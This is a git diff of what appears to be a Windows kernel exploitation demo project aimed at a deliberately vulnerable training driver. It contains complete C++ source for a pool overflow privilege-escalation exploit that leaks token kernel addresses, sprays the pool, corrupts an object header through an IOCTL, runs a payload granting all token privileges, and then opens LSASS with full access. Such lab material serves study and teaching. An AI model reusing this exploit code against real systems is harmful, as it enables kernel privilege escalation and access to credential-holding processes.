-typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
- PVOID Object;
- HANDLE UniqueProcessId;
- HANDLE HandleValue;
- ACCESS_MASK GrantedAccess;
- USHORT CreatorBackTraceIndex;
- USHORT ObjectTypeIndex;
- ULONG HandleAttributes;
- ULONG Reserved;
-} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
-
-typedef struct _SYSTEM_HANDLE_INFORMATION_EX
-{
- ULONG_PTR NumberOfHandles;
- ULONG_PTR Reserved;
- SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
-} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
-
-static const SYSTEM_INFORMATION_CLASS SystemExtendedHandleInformation = static_cast(64);
-
-typedef NTSTATUS(WINAPI *tNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
-
+#pragma once
+#include "stdafx.h"
+
+#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
+
+// Function: LeakProcessObjectAddresses
+// Description: Leaks the kernel address of every EPROCESS object the specific process (indicated by processId) has a HANDLE to.
+// Parameters:
+// processId - The Process ID to enumerate (will enumerate the EPROCESS objects that this process has a HANDLE to).
+// objectAddresses - Pointer to an array of PVOID. Each PVOID is a kernel address. Must be freed by the caller.
+// objectCount - The number of object addresses returned in the objectAddresses array.
+// Returns:
+// Success: Returns TRUE. objectAddresses and objectCount is set.
+// Failure: Returns FALSE. objectAddresses is set to NULL and objectCount is set to 0.
+BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount);
+
+// Function: LeakCurrentUserTokenAddress
+// Description: Leaks the kernel address of the logon token object of the current process.
+// Parameters:
+// tokenAddress - Pointer to the kernel address of the token object.
+// Returns:
+// Success: Returns TRUE. tokenAddress is set.
+// Failure: Returns FALSE. tokenAddress is set to NULL.
+BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress);
+
+// Function: LeakAddressOfByHandleInProcess
+// Description: Leaks the kernel address of a kernel object that the current process has a HANDLE to.
+// Parameters:
+// hHandle - Handle to the object to find the address of.
+// tokenAddress - Pointer to the kernel address of the token object.
+// Returns:
+// Success: Returns TRUE. tokenAddress is set.
+// Failure: Returns FALSE. tokenAddress is set to NULL.
+BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress);
+
+// Function: GetProcessIdByName
+// Description: Uses processName to return a corrosponding Process ID.
+// If there are multiple processes with the same name, it is undefined which ID is returned.
+// Parameters:
+// processName - The process name to retrieve an ID for.
+// processId - A pointer to a DWORD that will be filled by the function with the retrieved Process ID.
+// Returns:
+// Success: Returns TRUE. tokenAddress will be set.
+// Failure: Returns FALSE.
+BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId);
+
+
+//
+// Windows structures
+//
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
+ PVOID Object;
+ HANDLE UniqueProcessId;
+ HANDLE HandleValue;
+ ACCESS_MASK GrantedAccess;
+ USHORT CreatorBackTraceIndex;
+ USHORT ObjectTypeIndex;
+ ULONG HandleAttributes;
+ ULONG Reserved;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION_EX
+{
+ ULONG_PTR NumberOfHandles;
+ ULONG_PTR Reserved;
+ SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
+} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
+
+static const SYSTEM_INFORMATION_CLASS SystemExtendedHandleInformation = static_cast(64);
+
+typedef NTSTATUS(WINAPI *tNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
+
diff --git a/ExploitDemos/PoolOverflow.cpp b/ExploitDemos/PoolOverflow.cpp
index 29d6d6d..b69fdeb 100644
--- a/ExploitDemos/PoolOverflow.cpp
+++ b/ExploitDemos/PoolOverflow.cpp
@@ -1,243 +1,243 @@
-#pragma once
-#include "stdafx.h"
-#include "PoolOverflow.h"
-#include "KernelAddressLeak.h"
-#include "Structures.h"
-#include "Helpers.h"
-
-using namespace std;
-
-// Holds the address of a token privilege variable in the kernel that KernelPayload will overwrite.
-// Must be initialized before KernelPayload is called.
-UINT64* TokenPrivilegeAddress;
-
-// Payload to be called by kernel mode
-NTSTATUS KernelPayload();
-
-// BAD0B0B0 technique for exploiting pool overflows up to Windows 8. This implementation is 64bit only. It will fail on
-// Windows 8 if SMEP is enabled (would need to do a kernel ROP instead of executing code in usermode address space).
-// Presented by Nikita Tarakanov, http://conference.hitb.org/hitbsecconf2013ams/materials/D1T2%20-%20Nikita%20Tarakanov%20-%20Exploiting%20Hardcore%20Pool%20Corruptions%20in%20Microsoft%20Windows%20Kernel.zip
-// Test on Windows 6.1 x64
-BOOL AttackPO_BAD0B0B0(HANDLE hDevice)
-{
- const ULONG NUMBER_EVENTS = 1000;
-
- BOOL success = false;
-
- HANDLE hLsass = NULL;
- PVOID tokenAddress = NULL;
- HANDLE hEvents[NUMBER_EVENTS] = { 0 }; //Stores all the events I spray the pool with.
- char* attackStr = new char[1000];
- char* tmpAttackStr = attackStr;
- PVOID tempBuf = NULL;
- UNICODE_STRING ustr = { 0 };
- OVERFLOW_PAGEDPOOL* data = NULL;
-
- if (!VersionCheck(6, 1, 6, 1, AMD64))
- {
- printf("- Error: AttackPO_BAD0B0B0 only supports 64bit Windows 6.1\n");
- goto Cleanup;
- }
-
- // Set TokenPrivilegeAddress to the address of the tokens privileges
- if (!LeakCurrentUserTokenAddress((PVOID*)(&tokenAddress)))
- {
- printf("- Error: Unable to leak current user token address.\n");
- goto Cleanup;
- }
- printf("+ Address of user token: 0x%p\n", tokenAddress);
- TokenPrivilegeAddress = (UINT64*)((UINT_PTR)tokenAddress + 0x48);
-
- //
- // Spray the pool with Event objects
- //
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- hEvents[i] = CreateEventW(NULL, false, false, to_wstring(i).c_str());
-
- if (hEvents[i] == NULL)
- {
- printf("- Error: Unable to allocate kernel event. Pool spray failed. i = %i. Error: 0x%x\n", i, GetLastError());
- goto Cleanup;
- }
-
- /*
- //Debugging output
- PVOID address = NULL;
- if (!LeakAddressOfObjectByHandleInProcess(hEvents[i], &address))
- {
- printf("- Error: Call LeakAddressOfObjectByHandleInProcess\n");
- goto Cleanup;
- }
- printf("Address of event object: 0x%p\n", address);
- //printf("Press any key.\n");
- //getchar();
- */
- }
-
- // Punch some holes in to the pool
- size_t index = NUMBER_EVENTS - 1;
- ULONG holes = 40;
- while ((index > 0) && (holes > 0))
- {
- if (hEvents[index] != NULL)
- {
- CloseHandle(hEvents[index]);
- hEvents[index] = NULL;
- }
-
- index -= 2;
- holes--;
- }
-
- //
- // Trigger the vulnerability. This will smash a _OBJECT_HEADER of one of the Event objects I just allocated.
- //
-
- // Build the payload for the exploit
- memset(attackStr, 0, 1000);
- memset(tmpAttackStr, 0x41, 0xf8); // Padding
- tmpAttackStr += 0xf8;
- memset(tmpAttackStr, 0x1, 0x1); // Overwrite the typeindex with 0x1 to trigger 0xbad0b0b0
-
-
- USHORT length = (USHORT)((strlen(attackStr) / 2) + ((strlen(attackStr) % 2) * 2));
- ustr.Length = length;
- ustr.MaximumLength = length;
- ustr.Buffer = (wchar_t*)attackStr;
- data = new OVERFLOW_PAGEDPOOL();
- data->PoolType = NonPagedPoolMustSucceed;
- data->AllocationSize = 0x90; // Needs to be the same size as whatever object we spray the pool with.
- data->UserData = ustr;
-
- printf("+ Calling IOCTL to overflow pool.\n");
- DWORD bytesReturned = 0; // Not used
- BOOL bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL,
- data,
- sizeof(*data),
- data, // Won't actually be used in this exploit
- sizeof(*data),
- &bytesReturned,
- NULL
- );
- if (bRc == false)
- {
- printf("- Error calling DeviceIoControl with OVERFLOWPOOL control code. Error code: 0x%x", GetLastError());
- goto Cleanup;
- }
-
- //
- // Now allocate memory for a fake object at 0xbad0b0b0
- //
- LPVOID mem = VirtualAlloc((LPVOID)0xbad0b0b0, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- if (mem == NULL)
- {
- printf("- Error allocating memory for bad0b0b0 fake object.\n");
- goto Cleanup;
- }
-
-
- //
- // Write the address of our usermode shellcode
- //
- UINT_PTR* pFunctionPtr = (UINT_PTR*)((UINT_PTR)0xbad0b0b0 + (UINT_PTR)0x98);
- *pFunctionPtr = (UINT_PTR)(&KernelPayload);
-
-
- //
- // Trigger the smashed function pointer to be executed
- //
- HMODULE hModule = LoadLibraryW(L"ntdll.dll");
- tNtQuerySecurityObject pNtQuerySecurityObject = (tNtQuerySecurityObject)GetProcAddress(hModule, "NtQuerySecurityObject");
- FreeLibrary(hModule); //NtDll is always loaded, no need to hold our reference to it
- if (pNtQuerySecurityObject == NULL)
- {
- printf("- Error: Cannot retrieve NtQuerySecurityObject address.\n");
- goto Cleanup;
- }
-
- ULONG szTempBuf = 2048;
- ULONG realSize = 0;
- tempBuf = malloc(szTempBuf);
- if (tempBuf == NULL)
- {
- printf("- Error: Cannot allocate buffer for security information.\n");
- goto Cleanup;
- }
-
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- if (hEvents[i] != NULL)
- {
- // Call NtQuerySecurityObject on event event that is currently allocated. One of the event objects
- // has been smashed and will trigger the 0xbad0b0b0 exploit.
- NTSTATUS status = (*pNtQuerySecurityObject)(hEvents[i], DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)tempBuf, szTempBuf, &realSize);
- if (status != 0)
- {
- printf("- Error calling NtQuerySecurityObject. i = 0x%p. Return code: 0x%x\n", i, status);
- goto Cleanup;
- }
- }
- }
-
-
- //
- // Attempt to open a HANDLE to LSASS to see if the exploit worked.
- //
- DWORD lsassProcId = 0;
- if (!GetProcessIdByName(L"lsass.exe", &lsassProcId))
- {
- printf("- Failed to get lsass process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
-
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
- printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
- while (getchar())
- {
- printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
- }
-
- success = true;
-
-Cleanup:
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- if (hEvents[i] != NULL)
- {
- CloseHandle(hEvents[i]);
- hEvents[i] = NULL;
- }
- }
-
- if (hLsass != NULL)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- if (tempBuf != NULL)
- {
- free(tempBuf);
- }
-
- return success;
-}
-
-
-// KernelPayload will overwrite the privileges of the current user token to give the user all privileges.
-// Set TokenPrivilegeAddress and then get the kernel to call this function to elevate privileges.
-// This was presented by Cesar Curudo (https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf)
-NTSTATUS KernelPayload()
-{
- *((UINT64*)TokenPrivilegeAddress) = (UINT64)0xFFFFFFFFFFFFFFFF;
- return 0;
+#pragma once
+#include "stdafx.h"
+#include "PoolOverflow.h"
+#include "KernelAddressLeak.h"
+#include "Structures.h"
+#include "Helpers.h"
+
+using namespace std;
+
+// Holds the address of a token privilege variable in the kernel that KernelPayload will overwrite.
+// Must be initialized before KernelPayload is called.
+UINT64* TokenPrivilegeAddress;
+
+// Payload to be called by kernel mode
+NTSTATUS KernelPayload();
+
+// BAD0B0B0 technique for exploiting pool overflows up to Windows 8. This implementation is 64bit only. It will fail on
+// Windows 8 if SMEP is enabled (would need to do a kernel ROP instead of executing code in usermode address space).
+// Presented by Nikita Tarakanov, http://conference.hitb.org/hitbsecconf2013ams/materials/D1T2%20-%20Nikita%20Tarakanov%20-%20Exploiting%20Hardcore%20Pool%20Corruptions%20in%20Microsoft%20Windows%20Kernel.zip
+// Test on Windows 6.1 x64
+BOOL AttackPO_BAD0B0B0(HANDLE hDevice)
+{
+ const ULONG NUMBER_EVENTS = 1000;
+
+ BOOL success = false;
+
+ HANDLE hLsass = NULL;
+ PVOID tokenAddress = NULL;
+ HANDLE hEvents[NUMBER_EVENTS] = { 0 }; //Stores all the events I spray the pool with.
+ char* attackStr = new char[1000];
+ char* tmpAttackStr = attackStr;
+ PVOID tempBuf = NULL;
+ UNICODE_STRING ustr = { 0 };
+ OVERFLOW_PAGEDPOOL* data = NULL;
+
+ if (!VersionCheck(6, 1, 6, 1, AMD64))
+ {
+ printf("- Error: AttackPO_BAD0B0B0 only supports 64bit Windows 6.1\n");
+ goto Cleanup;
+ }
+
+ // Set TokenPrivilegeAddress to the address of the tokens privileges
+ if (!LeakCurrentUserTokenAddress((PVOID*)(&tokenAddress)))
+ {
+ printf("- Error: Unable to leak current user token address.\n");
+ goto Cleanup;
+ }
+ printf("+ Address of user token: 0x%p\n", tokenAddress);
+ TokenPrivilegeAddress = (UINT64*)((UINT_PTR)tokenAddress + 0x48);
+
+ //
+ // Spray the pool with Event objects
+ //
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ hEvents[i] = CreateEventW(NULL, false, false, to_wstring(i).c_str());
+
+ if (hEvents[i] == NULL)
+ {
+ printf("- Error: Unable to allocate kernel event. Pool spray failed. i = %i. Error: 0x%x\n", i, GetLastError());
+ goto Cleanup;
+ }
+
+ /*
+ //Debugging output
+ PVOID address = NULL;
+ if (!LeakAddressOfObjectByHandleInProcess(hEvents[i], &address))
+ {
+ printf("- Error: Call LeakAddressOfObjectByHandleInProcess\n");
+ goto Cleanup;
+ }
+ printf("Address of event object: 0x%p\n", address);
+ //printf("Press any key.\n");
+ //getchar();
+ */
+ }
+
+ // Punch some holes in to the pool
+ size_t index = NUMBER_EVENTS - 1;
+ ULONG holes = 40;
+ while ((index > 0) && (holes > 0))
+ {
+ if (hEvents[index] != NULL)
+ {
+ CloseHandle(hEvents[index]);
+ hEvents[index] = NULL;
+ }
+
+ index -= 2;
+ holes--;
+ }
+
+ //
+ // Trigger the vulnerability. This will smash a _OBJECT_HEADER of one of the Event objects I just allocated.
+ //
+
+ // Build the payload for the exploit
+ memset(attackStr, 0, 1000);
+ memset(tmpAttackStr, 0x41, 0xf8); // Padding
+ tmpAttackStr += 0xf8;
+ memset(tmpAttackStr, 0x1, 0x1); // Overwrite the typeindex with 0x1 to trigger 0xbad0b0b0
+
+
+ USHORT length = (USHORT)((strlen(attackStr) / 2) + ((strlen(attackStr) % 2) * 2));
+ ustr.Length = length;
+ ustr.MaximumLength = length;
+ ustr.Buffer = (wchar_t*)attackStr;
+ data = new OVERFLOW_PAGEDPOOL();
+ data->PoolType = NonPagedPoolMustSucceed;
+ data->AllocationSize = 0x90; // Needs to be the same size as whatever object we spray the pool with.
+ data->UserData = ustr;
+
+ printf("+ Calling IOCTL to overflow pool.\n");
+ DWORD bytesReturned = 0; // Not used
+ BOOL bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL,
+ data,
+ sizeof(*data),
+ data, // Won't actually be used in this exploit
+ sizeof(*data),
+ &bytesReturned,
+ NULL
+ );
+ if (bRc == false)
+ {
+ printf("- Error calling DeviceIoControl with OVERFLOWPOOL control code. Error code: 0x%x", GetLastError());
+ goto Cleanup;
+ }
+
+ //
+ // Now allocate memory for a fake object at 0xbad0b0b0
+ //
+ LPVOID mem = VirtualAlloc((LPVOID)0xbad0b0b0, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ if (mem == NULL)
+ {
+ printf("- Error allocating memory for bad0b0b0 fake object.\n");
+ goto Cleanup;
+ }
+
+
+ //
+ // Write the address of our usermode shellcode
+ //
+ UINT_PTR* pFunctionPtr = (UINT_PTR*)((UINT_PTR)0xbad0b0b0 + (UINT_PTR)0x98);
+ *pFunctionPtr = (UINT_PTR)(&KernelPayload);
+
+
+ //
+ // Trigger the smashed function pointer to be executed
+ //
+ HMODULE hModule = LoadLibraryW(L"ntdll.dll");
+ tNtQuerySecurityObject pNtQuerySecurityObject = (tNtQuerySecurityObject)GetProcAddress(hModule, "NtQuerySecurityObject");
+ FreeLibrary(hModule); //NtDll is always loaded, no need to hold our reference to it
+ if (pNtQuerySecurityObject == NULL)
+ {
+ printf("- Error: Cannot retrieve NtQuerySecurityObject address.\n");
+ goto Cleanup;
+ }
+
+ ULONG szTempBuf = 2048;
+ ULONG realSize = 0;
+ tempBuf = malloc(szTempBuf);
+ if (tempBuf == NULL)
+ {
+ printf("- Error: Cannot allocate buffer for security information.\n");
+ goto Cleanup;
+ }
+
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ if (hEvents[i] != NULL)
+ {
+ // Call NtQuerySecurityObject on event event that is currently allocated. One of the event objects
+ // has been smashed and will trigger the 0xbad0b0b0 exploit.
+ NTSTATUS status = (*pNtQuerySecurityObject)(hEvents[i], DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)tempBuf, szTempBuf, &realSize);
+ if (status != 0)
+ {
+ printf("- Error calling NtQuerySecurityObject. i = 0x%p. Return code: 0x%x\n", i, status);
+ goto Cleanup;
+ }
+ }
+ }
+
+
+ //
+ // Attempt to open a HANDLE to LSASS to see if the exploit worked.
+ //
+ DWORD lsassProcId = 0;
+ if (!GetProcessIdByName(L"lsass.exe", &lsassProcId))
+ {
+ printf("- Failed to get lsass process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
+
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+ printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
+ while (getchar())
+ {
+ printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
+ }
+
+ success = true;
+
+Cleanup:
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ if (hEvents[i] != NULL)
+ {
+ CloseHandle(hEvents[i]);
+ hEvents[i] = NULL;
+ }
+ }
+
+ if (hLsass != NULL)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ if (tempBuf != NULL)
+ {
+ free(tempBuf);
+ }
+
+ return success;
+}
+
+
+// KernelPayload will overwrite the privileges of the current user token to give the user all privileges.
+// Set TokenPrivilegeAddress and then get the kernel to call this function to elevate privileges.
+// This was presented by Cesar Curudo (https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf)
+NTSTATUS KernelPayload()
+{
+ *((UINT64*)TokenPrivilegeAddress) = (UINT64)0xFFFFFFFFFFFFFFFF;
+ return 0;
}
\ No newline at end of file
diff --git a/ExploitDemos/PoolOverflow.h b/ExploitDemos/PoolOverflow.h
index 416d298..aee53b9 100644
--- a/ExploitDemos/PoolOverflow.h
+++ b/ExploitDemos/PoolOverflow.h
@@ -1,7 +1,7 @@
-#pragma once
-
-#include "stdafx.h"
-
-typedef NTSTATUS(WINAPI *tNtQuerySecurityObject)(HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR, ULONG, PULONG);
-
+#pragma once
+
+#include "stdafx.h"
+
+typedef NTSTATUS(WINAPI *tNtQuerySecurityObject)(HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR, ULONG, PULONG);
+
BOOL AttackPO_BAD0B0B0(HANDLE hDevice);
\ No newline at end of file
diff --git a/ExploitDemos/ReadMe.txt b/ExploitDemos/ReadMe.txt
index b907969..2469d24 100644
--- a/ExploitDemos/ReadMe.txt
+++ b/ExploitDemos/ReadMe.txt
@@ -1,40 +1,40 @@
-========================================================================
- CONSOLE APPLICATION : ExploitDemos Project Overview
-========================================================================
-
-AppWizard has created this ExploitDemos application for you.
-
-This file contains a summary of what you will find in each of the files that
-make up your ExploitDemos application.
-
-
-ExploitDemos.vcxproj
- This is the main project file for VC++ projects generated using an Application Wizard.
- It contains information about the version of Visual C++ that generated the file, and
- information about the platforms, configurations, and project features selected with the
- Application Wizard.
-
-ExploitDemos.vcxproj.filters
- This is the filters file for VC++ projects generated using an Application Wizard.
- It contains information about the association between the files in your project
- and the filters. This association is used in the IDE to show grouping of files with
- similar extensions under a specific node (for e.g. ".cpp" files are associated with the
- "Source Files" filter).
-
-ExploitDemos.cpp
- This is the main application source file.
-
-/////////////////////////////////////////////////////////////////////////////
-Other standard files:
-
-StdAfx.h, StdAfx.cpp
- These files are used to build a precompiled header (PCH) file
- named ExploitDemos.pch and a precompiled types file named StdAfx.obj.
-
-/////////////////////////////////////////////////////////////////////////////
-Other notes:
-
-AppWizard uses "TODO:" comments to indicate parts of the source code you
-should add to or customize.
-
-/////////////////////////////////////////////////////////////////////////////
+========================================================================
+ CONSOLE APPLICATION : ExploitDemos Project Overview
+========================================================================
+
+AppWizard has created this ExploitDemos application for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your ExploitDemos application.
+
+
+ExploitDemos.vcxproj
+ This is the main project file for VC++ projects generated using an Application Wizard.
+ It contains information about the version of Visual C++ that generated the file, and
+ information about the platforms, configurations, and project features selected with the
+ Application Wizard.
+
+ExploitDemos.vcxproj.filters
+ This is the filters file for VC++ projects generated using an Application Wizard.
+ It contains information about the association between the files in your project
+ and the filters. This association is used in the IDE to show grouping of files with
+ similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+ "Source Files" filter).
+
+ExploitDemos.cpp
+ This is the main application source file.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+ These files are used to build a precompiled header (PCH) file
+ named ExploitDemos.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/ExploitDemos/Structures.h b/ExploitDemos/Structures.h
index ee51224..ca2a7e1 100644
--- a/ExploitDemos/Structures.h
+++ b/ExploitDemos/Structures.h
@@ -1,65 +1,65 @@
-#pragma once
-#include "stdafx.h"
-
-
-typedef _Enum_is_bitflag_ enum _POOL_TYPE {
- NonPagedPool,
- NonPagedPoolExecute = NonPagedPool,
- PagedPool,
- NonPagedPoolMustSucceed = NonPagedPool + 2,
- DontUseThisType,
- NonPagedPoolCacheAligned = NonPagedPool + 4,
- PagedPoolCacheAligned,
- NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
- MaxPoolType,
-
- //
- // Define base types for NonPaged (versus Paged) pool, for use in cracking
- // the underlying pool type.
- //
-
- NonPagedPoolBase = 0,
- NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
- NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
- NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
-
- //
- // Note these per session types are carefully chosen so that the appropriate
- // masking still applies as well as MaxPoolType above.
- //
-
- NonPagedPoolSession = 32,
- PagedPoolSession = NonPagedPoolSession + 1,
- NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
- DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
- NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
- PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
- NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
-
- NonPagedPoolNx = 512,
- NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
- NonPagedPoolSessionNx = NonPagedPoolNx + 32,
-
-} _Enum_is_bitflag_ POOL_TYPE;
-
-
-typedef struct _DATACOPY
-{
- DWORD SourceLength;
- PVOID Source;
- DWORD DestLength;
- PVOID Dest;
-} DATACOPY, *PDATACOPY;
-
-typedef struct _DECADDRESS
-{
- BOOL Dec;
- size_t* Value;
-} DECADDRESS, *PDECADDRESS;
-
-typedef struct _OVERFLOW_PAGEDPOOL
-{
- POOL_TYPE PoolType;
- DWORD AllocationSize;
- UNICODE_STRING UserData;
-} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
+#pragma once
+#include "stdafx.h"
+
+
+typedef _Enum_is_bitflag_ enum _POOL_TYPE {
+ NonPagedPool,
+ NonPagedPoolExecute = NonPagedPool,
+ PagedPool,
+ NonPagedPoolMustSucceed = NonPagedPool + 2,
+ DontUseThisType,
+ NonPagedPoolCacheAligned = NonPagedPool + 4,
+ PagedPoolCacheAligned,
+ NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
+ MaxPoolType,
+
+ //
+ // Define base types for NonPaged (versus Paged) pool, for use in cracking
+ // the underlying pool type.
+ //
+
+ NonPagedPoolBase = 0,
+ NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
+ NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
+ NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
+
+ //
+ // Note these per session types are carefully chosen so that the appropriate
+ // masking still applies as well as MaxPoolType above.
+ //
+
+ NonPagedPoolSession = 32,
+ PagedPoolSession = NonPagedPoolSession + 1,
+ NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
+ DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
+ NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
+ PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
+ NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
+
+ NonPagedPoolNx = 512,
+ NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
+ NonPagedPoolSessionNx = NonPagedPoolNx + 32,
+
+} _Enum_is_bitflag_ POOL_TYPE;
+
+
+typedef struct _DATACOPY
+{
+ DWORD SourceLength;
+ PVOID Source;
+ DWORD DestLength;
+ PVOID Dest;
+} DATACOPY, *PDATACOPY;
+
+typedef struct _DECADDRESS
+{
+ BOOL Dec;
+ size_t* Value;
+} DECADDRESS, *PDECADDRESS;
+
+typedef struct _OVERFLOW_PAGEDPOOL
+{
+ POOL_TYPE PoolType;
+ DWORD AllocationSize;
+ UNICODE_STRING UserData;
+} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
diff --git a/ExploitDemos/stdafx.cpp b/ExploitDemos/stdafx.cpp
index a0dbff3..be1a169 100644
--- a/ExploitDemos/stdafx.cpp
+++ b/ExploitDemos/stdafx.cpp
@@ -1,8 +1,8 @@
-// stdafx.cpp : source file that includes just the standard includes
-// ExploitDemos.pch will be the pre-compiled header
-// stdafx.obj will contain the pre-compiled type information
-
-#include "stdafx.h"
-
-// TODO: reference any additional headers you need in STDAFX.H
-// and not in this file
+// stdafx.cpp : source file that includes just the standard includes
+// ExploitDemos.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/ExploitDemos/stdafx.h b/ExploitDemos/stdafx.h
index 5ce5d13..e1f5d1f 100644
--- a/ExploitDemos/stdafx.h
+++ b/ExploitDemos/stdafx.h
@@ -1,29 +1,29 @@
-// stdafx.h : include file for standard system include files,
-// or project specific include files that are used frequently, but
-// are changed infrequently
-//
-
-#pragma once
-
-#include "targetver.h"
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define WIN32_LEAN_AND_MEAN
-#include
-
-#include
-#include
-#include
-#include
-#include
-
-#include "..\KdExploitMe\KdExploitMe.h"
-
-
-// TODO: reference additional headers your program requires here
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define WIN32_LEAN_AND_MEAN
+#include
+
+#include
+#include
+#include
+#include
+#include
+
+#include "..\KdExploitMe\KdExploitMe.h"
+
+
+// TODO: reference additional headers your program requires here
diff --git a/ExploitDemos/targetver.h b/ExploitDemos/targetver.h
index 87c0086..90e767b 100644
--- a/ExploitDemos/targetver.h
+++ b/ExploitDemos/targetver.h
@@ -1,8 +1,8 @@
-#pragma once
-
-// Including SDKDDKVer.h defines the highest available Windows platform.
-
-// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
-// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
-
-#include
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
new file mode 100644
index 0000000..9cd4e84
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
